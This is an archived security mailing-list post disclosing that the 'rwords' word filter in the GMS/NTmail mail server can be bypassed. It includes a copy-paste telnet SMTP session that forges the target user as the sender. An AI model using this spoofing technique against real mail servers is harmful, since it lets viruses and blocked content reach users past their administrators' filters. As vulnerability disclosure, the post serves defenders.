| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: geoincidents at getinfo.org (Geoincidents) Subject: Another NTmail exploit GMS (what used to be called NTmail) has a filtering feature called "rwords" that allows you to block incoming email based on word or phrase. If you add a phrase to the rwords list then no email with that phrase should be delivered to your users. Likewise if you add a virus signature this feature can be used to block email virus. >From anywhere in the world try the following (replace rwords and the addresses then cut and paste this into a command prompt if you like): telnet mail.targetmailserver.com 25 helo bob mail from:targetuser@...getmailserver.com rcpt to:targetuser@...getmailserver.com data From:targetuser@...getmailserver.com To:targetuser@...getmailserver.com Subject:delivery test this is a test rwords go here . quit Now go check that mailbox, rwords filtered email should not have been delivered to it but there it is.. complete with virus or whatever else you were trying to filter. This makes it trivial for anyone to bypass rwords type filters. If your boss tells you to filter out emails requesting a r e s u m e from employees then I could easily send your boss an email requesting his. Geo.
Powered by blists - more mailing lists